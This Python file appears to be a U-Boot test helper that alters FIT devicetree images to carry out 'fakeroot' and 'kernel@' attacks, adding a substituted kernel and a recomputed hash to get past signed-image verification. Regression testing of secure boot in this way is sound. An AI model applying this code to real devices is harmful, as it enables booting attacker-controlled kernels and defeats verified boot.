1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
|
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2020, Intel Corporation
"""Modifies a devicetree to add a fake root node, for testing purposes"""
import hashlib
import struct
import sys
FDT_PROP = 0x3
FDT_BEGIN_NODE = 0x1
FDT_END_NODE = 0x2
FDT_END = 0x9
FAKE_ROOT_ATTACK = 0
KERNEL_AT = 1
MAGIC = 0xd00dfeed
EVIL_KERNEL_NAME = b'evil_kernel'
FAKE_ROOT_NAME = b'f@keroot'
def getstr(dt_strings, off):
"""Get a string from the devicetree string table
Args:
dt_strings (bytes): Devicetree strings section
off (int): Offset of string to read
Returns:
str: String read from the table
"""
output = ''
while dt_strings[off]:
output += chr(dt_strings[off])
off += 1
return output
def align(offset):
"""Align an offset to a multiple of 4
Args:
offset (int): Offset to align
Returns:
int: Resulting aligned offset (rounds up to nearest multiple)
"""
return (offset + 3) & ~3
def determine_offset(dt_struct, dt_strings, searched_node_name):
"""Determines the offset of an element, either a node or a property
Args:
dt_struct (bytes): Devicetree struct section
dt_strings (bytes): Devicetree strings section
searched_node_name (str): element path, ex: /images/kernel@1/data
Returns:
tuple: (node start offset, node end offset)
if element is not found, returns (None, None)
"""
offset = 0
depth = -1
path = '/'
object_start_offset = None
object_end_offset = None
object_depth = None
while offset < len(dt_struct):
(tag,) = struct.unpack('>I', dt_struct[offset:offset + 4])
if tag == FDT_BEGIN_NODE:
depth += 1
begin_node_offset = offset
offset += 4
node_name = getstr(dt_struct, offset)
offset += len(node_name) + 1
offset = align(offset)
if path[-1] != '/':
path += '/'
path += str(node_name)
if path == searched_node_name:
object_start_offset = begin_node_offset
object_depth = depth
elif tag == FDT_PROP:
begin_prop_offset = offset
offset += 4
len_tag, nameoff = struct.unpack('>II',
dt_struct[offset:offset + 8])
offset += 8
prop_name = getstr(dt_strings, nameoff)
len_tag = align(len_tag)
offset += len_tag
node_path = path + '/' + str(prop_name)
if node_path == searched_node_name:
object_start_offset = begin_prop_offset
elif tag == FDT_END_NODE:
offset += 4
path = path[:path.rfind('/')]
if not path:
path = '/'
if depth == object_depth:
object_end_offset = offset
break
depth -= 1
elif tag == FDT_END:
break
else:
print('unknown tag=0x%x, offset=0x%x found!' % (tag, offset))
break
return object_start_offset, object_end_offset
def modify_node_name(dt_struct, node_offset, replcd_name):
"""Change the name of a node
Args:
dt_struct (bytes): Devicetree struct section
node_offset (int): Offset of node
replcd_name (str): New name for node
Returns:
bytes: New dt_struct contents
"""
# skip 4 bytes for the FDT_BEGIN_NODE
node_offset += 4
node_name = getstr(dt_struct, node_offset)
node_name_len = len(node_name) + 1
node_name_len = align(node_name_len)
replcd_name += b'\0'
# align on 4 bytes
while len(replcd_name) % 4:
replcd_name += b'\0'
dt_struct = (dt_struct[:node_offset] + replcd_name +
dt_struct[node_offset + node_name_len:])
return dt_struct
def modify_prop_content(dt_struct, prop_offset, content):
"""Overwrite the value of a property
Args:
dt_struct (bytes): Devicetree struct section
prop_offset (int): Offset of property (FDT_PROP tag)
content (bytes): New content for the property
Returns:
bytes: New dt_struct contents
"""
# skip FDT_PROP
prop_offset += 4
(len_tag, nameoff) = struct.unpack('>II',
dt_struct[prop_offset:prop_offset + 8])
# compute padded original node length
original_node_len = len_tag + 8 # content length + prop meta data len
original_node_len = align(original_node_len)
added_data = struct.pack('>II', len(content), nameoff)
added_data += content
while len(added_data) % 4:
added_data += b'\0'
dt_struct = (dt_struct[:prop_offset] + added_data +
dt_struct[prop_offset + original_node_len:])
return dt_struct
def change_property_value(dt_struct, dt_strings, prop_path, prop_value,
required=True):
"""Change a given property value
Args:
dt_struct (bytes): Devicetree struct section
dt_strings (bytes): Devicetree strings section
prop_path (str): full path of the target property
prop_value (bytes): new property name
required (bool): raise an exception if property not found
Returns:
bytes: New dt_struct contents
Raises:
ValueError: if the property is not found
"""
(rt_node_start, _) = determine_offset(dt_struct, dt_strings, prop_path)
if rt_node_start is None:
if not required:
return dt_struct
raise ValueError('Fatal error, unable to find prop %s' % prop_path)
dt_struct = modify_prop_content(dt_struct, rt_node_start, prop_value)
return dt_struct
def change_node_name(dt_struct, dt_strings, node_path, node_name):
"""Change a given node name
Args:
dt_struct (bytes): Devicetree struct section
dt_strings (bytes): Devicetree strings section
node_path (str): full path of the target node
node_name (str): new node name, just node name not full path
Returns:
bytes: New dt_struct contents
Raises:
ValueError: if the node is not found
"""
(rt_node_start, rt_node_end) = (
determine_offset(dt_struct, dt_strings, node_path))
if rt_node_start is None or rt_node_end is None:
raise ValueError('Fatal error, unable to find root node')
dt_struct = modify_node_name(dt_struct, rt_node_start, node_name)
return dt_struct
def get_prop_value(dt_struct, dt_strings, prop_path):
"""Get the content of a property based on its path
Args:
dt_struct (bytes): Devicetree struct section
dt_strings (bytes): Devicetree strings section
prop_path (str): full path of the target property
Returns:
bytes: Property value
Raises:
ValueError: if the property is not found
"""
(offset, _) = determine_offset(dt_struct, dt_strings, prop_path)
if offset is None:
raise ValueError('Fatal error, unable to find prop')
offset += 4
(len_tag,) = struct.unpack('>I', dt_struct[offset:offset + 4])
offset += 8
tag_data = dt_struct[offset:offset + len_tag]
return tag_data
def kernel_at_attack(dt_struct, dt_strings, kernel_content, kernel_hash):
"""Conduct the kernel@ attack
It fetches from /configurations/default the name of the kernel being loaded.
Then, if the kernel name does not contain any @sign, duplicates the kernel
in /images node and appends '@evil' to its name.
It inserts a new kernel content and updates its images digest.
Inputs:
- FIT dt_struct
- FIT dt_strings
- kernel content blob
- kernel hash blob
Important note: it assumes the U-Boot loading method is 'kernel' and the
loaded kernel hash's subnode name is 'hash-1'
"""
# retrieve the default configuration name
default_conf_name = get_prop_value(
dt_struct, dt_strings, '/configurations/default')
default_conf_name = str(default_conf_name[:-1], 'utf-8')
conf_path = '/configurations/' + default_conf_name
# fetch the loaded kernel name from the default configuration
loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel')
loaded_kernel = str(loaded_kernel[:-1], 'utf-8')
if loaded_kernel.find('@') != -1:
print('kernel@ attack does not work on nodes already containing an @ sign!')
sys.exit()
# determine boundaries of the loaded kernel
(krn_node_start, krn_node_end) = (determine_offset(
dt_struct, dt_strings, '/images/' + loaded_kernel))
if krn_node_start is None and krn_node_end is None:
print('Fatal error, unable to find root node')
sys.exit()
# copy the loaded kernel
loaded_kernel_copy = dt_struct[krn_node_start:krn_node_end]
# insert the copy inside the tree
dt_struct = dt_struct[:krn_node_start] + \
loaded_kernel_copy + dt_struct[krn_node_start:]
evil_kernel_name = loaded_kernel+'@evil'
# change the inserted kernel name
dt_struct = change_node_name(
dt_struct, dt_strings, '/images/' + loaded_kernel, bytes(evil_kernel_name, 'utf-8'))
# change the content of the kernel being loaded
dt_struct = change_property_value(
dt_struct, dt_strings, '/images/' + evil_kernel_name + '/data', kernel_content)
# change the content of the kernel being loaded
dt_struct = change_property_value(
dt_struct, dt_strings, '/images/' + evil_kernel_name + '/hash-1/value', kernel_hash)
return dt_struct
def fake_root_node_attack(dt_struct, dt_strings, kernel_content, kernel_digest):
"""Conduct the fakenode attack
It duplicates the original root node at the beginning of the tree.
Then it modifies within this duplicated tree:
- The loaded kernel name
- The loaded kernel data
Important note: it assumes the UBoot loading method is 'kernel' and the loaded kernel
hash's subnode name is hash@1
"""
# retrieve the default configuration name
default_conf_name = get_prop_value(
dt_struct, dt_strings, '/configurations/default')
default_conf_name = str(default_conf_name[:-1], 'utf-8')
conf_path = '/configurations/'+default_conf_name
# fetch the loaded kernel name from the default configuration
loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel')
loaded_kernel = str(loaded_kernel[:-1], 'utf-8')
# determine root node start and end:
(rt_node_start, rt_node_end) = (determine_offset(dt_struct, dt_strings, '/'))
if (rt_node_start is None) or (rt_node_end is None):
print('Fatal error, unable to find root node')
sys.exit()
# duplicate the whole tree
duplicated_node = dt_struct[rt_node_start:rt_node_end]
# dchange root name (empty name) to fake root name
new_dup = change_node_name(duplicated_node, dt_strings, '/', FAKE_ROOT_NAME)
dt_struct = new_dup + dt_struct
# change the value of /<fake_root_name>/configs/<default_config_name>/kernel
# so our modified kernel will be loaded
base = '/' + str(FAKE_ROOT_NAME, 'utf-8')
value_path = base + conf_path+'/kernel'
dt_struct = change_property_value(dt_struct, dt_strings, value_path,
EVIL_KERNEL_NAME + b'\0')
# change the node of the /<fake_root_name>/images/<original_kernel_name>
images_path = base + '/images/'
node_path = images_path + loaded_kernel
dt_struct = change_node_name(dt_struct, dt_strings, node_path,
EVIL_KERNEL_NAME)
# change the content of the kernel being loaded
data_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/data'
dt_struct = change_property_value(dt_struct, dt_strings, data_path,
kernel_content, required=False)
# update the digest value
hash_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/hash-1/value'
dt_struct = change_property_value(dt_struct, dt_strings, hash_path,
kernel_digest)
return dt_struct
def add_evil_node(in_fname, out_fname, kernel_fname, attack):
"""Add an evil node to the devicetree
Args:
in_fname (str): Filename of input devicetree
out_fname (str): Filename to write modified devicetree to
kernel_fname (str): Filename of kernel data to add to evil node
attack (str): Attack type ('fakeroot' or 'kernel@')
Raises:
ValueError: Unknown attack name
"""
if attack == 'fakeroot':
attack = FAKE_ROOT_ATTACK
elif attack == 'kernel@':
attack = KERNEL_AT
else:
raise ValueError('Unknown attack name!')
with open(in_fname, 'rb') as fin:
input_data = fin.read()
hdr = input_data[0:0x28]
offset = 0
magic = struct.unpack('>I', hdr[offset:offset + 4])[0]
if magic != MAGIC:
raise ValueError('Wrong magic!')
offset += 4
(totalsize, off_dt_struct, off_dt_strings, off_mem_rsvmap, version,
last_comp_version, boot_cpuid_phys, size_dt_strings,
size_dt_struct) = struct.unpack('>IIIIIIIII', hdr[offset:offset + 36])
rsv_map = input_data[off_mem_rsvmap:off_dt_struct]
dt_struct = input_data[off_dt_struct:off_dt_struct + size_dt_struct]
dt_strings = input_data[off_dt_strings:off_dt_strings + size_dt_strings]
with open(kernel_fname, 'rb') as kernel_file:
kernel_content = kernel_file.read()
# computing inserted kernel hash
val = hashlib.sha1()
val.update(kernel_content)
hash_digest = val.digest()
if attack == FAKE_ROOT_ATTACK:
dt_struct = fake_root_node_attack(dt_struct, dt_strings, kernel_content,
hash_digest)
elif attack == KERNEL_AT:
dt_struct = kernel_at_attack(dt_struct, dt_strings, kernel_content,
hash_digest)
# now rebuild the new file
size_dt_strings = len(dt_strings)
size_dt_struct = len(dt_struct)
totalsize = 0x28 + len(rsv_map) + size_dt_struct + size_dt_strings
off_mem_rsvmap = 0x28
off_dt_struct = off_mem_rsvmap + len(rsv_map)
off_dt_strings = off_dt_struct + len(dt_struct)
header = struct.pack('>IIIIIIIIII', MAGIC, totalsize, off_dt_struct,
off_dt_strings, off_mem_rsvmap, version,
last_comp_version, boot_cpuid_phys, size_dt_strings,
size_dt_struct)
with open(out_fname, 'wb') as output_file:
output_file.write(header)
output_file.write(rsv_map)
output_file.write(dt_struct)
output_file.write(dt_strings)
if __name__ == '__main__':
if len(sys.argv) != 5:
print('usage: %s <input_filename> <output_filename> <kernel_binary> <attack_name>' %
sys.argv[0])
print('valid attack names: [fakeroot, kernel@]')
sys.exit(1)
in_fname, out_fname, kernel_fname, attack = sys.argv[1:]
add_evil_node(in_fname, out_fname, kernel_fname, attack)
|
